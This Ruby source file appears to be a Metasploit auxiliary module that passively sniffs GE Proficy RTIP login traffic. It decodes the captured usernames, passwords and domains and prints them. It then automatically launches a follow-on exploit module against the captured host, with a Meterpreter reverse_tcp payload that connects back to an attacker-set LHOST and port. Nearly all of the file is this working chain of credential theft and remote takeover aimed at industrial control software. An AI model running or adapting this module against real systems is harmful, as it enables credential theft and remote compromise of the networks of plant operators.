|
## # $Id: rtipsniff.rb ##
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## # # MacbookPro:metasploit kfinisterre$ cd /Users/kfinisterre/Desktop/metasploit; sudo ./msfcli auxiliary/test/rtipsniff INTERFACE=en1 E # [*] Opening the network interface... # [*] Sniffing RTIP login requests... # [*] Proficy RTIP Credentials -> user: Administrator pass: This was base64 encoded domain: ProficySniffTest # # #
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Exploit::Capture def initialize super( 'Name' => 'GE Proficy Real Time Information Portal Credentials Leak', 'Version' => '$Revision: 1 $', 'Description' => 'This module sniffs RTIP login requests from the network', 'Author' => ['hdm','kf'], 'License' => MSF_LICENSE, 'Actions' => [ [ 'Sniffer' ] ], 'PassiveActions' => [ 'Sniffer' ], 'DefaultAction' => 'Sniffer' ) register_options([ OptAddress.new('LHOST', [true, 'The IP address to use for reverse-connect payloads']), OptPort.new('LPORT', [false, 'The starting TCP port number for reverse-connect payloads', 4444]) ], self.class) end
def init_hooked_on_fanucs(name,user,pass,domain, rhost, targ = 0) targ ||= 0 payload='windows/meterpreter/reverse_tcp' sploit = framework.modules.create(name) sploit.datastore['USERNAME'] = user sploit.datastore['PASSWORD'] = pass sploit.datastore['DOMAIN'] = domain sploit.datastore['RHOST'] = rhost sploit.datastore['LPORT'] = datastore['LPORT'] sploit.datastore['LHOST'] = datastore['LHOST'] sploit.exploit_simple( 'LocalInput' => self.user_input, 'LocalOutput' => self.user_output, 'Target' => targ, 'Payload' => payload, 'RunAsJob' => true) end
def run username = "a", password = "b", domain = "c"
print_status("Opening the network interface...") open_pcap()
print_status("Sniffing RTIP login requests...") each_packet() do |pkt| next if not pkt.tcp? if (pkt.payload =~ /\x56\x5d\x72\x2b\x30\xd7\xf2\xc6\x74/)
marker = "\x56\x5d\x72\x2b\x30\xd7\xf2\xc6\x74" data = pkt.payload credentials = data.split(marker)[1].split("\x00") username = credentials[1] password = credentials[2] domain = credentials[3].split("\x01")[0] username = username[1..(username.length-2)] password = password[1..(password.length-2)].unpack("m") domain = domain[1..(domain.length-2)] print_status("Proficy RTIP Credentials -> user: #{username} pass: #{password} domain: #{domain} ip: #{pkt.ip_daddr}") init_hooked_on_fanucs('exploit/windows/misc/hooked_on_fanucs',"#{username}","#{password}","#{domain}", "#{pkt.ip_daddr}") end true end print_status("Finished sniffing") end end
|
|
|